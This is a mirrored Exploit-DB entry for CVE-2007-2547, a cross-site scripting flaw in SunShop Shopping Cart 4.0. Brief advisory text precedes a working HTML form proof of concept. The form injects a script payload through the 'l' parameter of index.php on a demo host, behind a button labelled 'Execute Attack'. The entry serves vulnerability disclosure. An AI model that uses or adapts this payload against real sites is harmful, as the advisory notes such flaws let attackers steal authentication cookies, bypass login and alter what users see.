- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29961
- Проверка EDB
-
- Пройдено
- Автор
- JOHN MARTINELLI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2547
- Дата публикации
- 2007-05-07
SunShop Shopping Cart 4.0 - 'index.php?l' Cross-Site Scripting
Код:
source: https://www.securityfocus.com/bid/23856/info
TurnkeyWebTools SunShop Shopping Cart is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, bypass the authentication mechanism, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. Other attacks are also possible.
SunShop Shopping Cart v4 is reported vulnerable; other versions may also be affected.
<form action="http://demos.turnkeywebtools.com/ss4/index.php" method="post">
<input name="l" size=75 value="<script %0a%0d>alert(1);</script>">
<input name="remove[0]" type="hidden" value="off">
<input name="quantity[0:49]" type="hidden" value="1">
<input name="remove[1]" type="hidden" value="off">
<input name="quantity[1:50]" type="hidden" value="1">
<input name="remove[2]" type="hidden" value="off">
<input name="quantity[2:55]" type="hidden" value="1">
<input name="remove[3]" type="hidden" value="off">
<input name="quantity[3:42]" type="hidden" value="1">
<input name="remove[4]" type="hidden" value="off">
<input name="quantity[4:51]" type="hidden" value="1">
<input name="coupon" type="hidden" value="[email protected]">
<input type=submit value="Execute Attack on variable 'l' in index.php" class="button">
</form>
- Источник
- www.exploit-db.com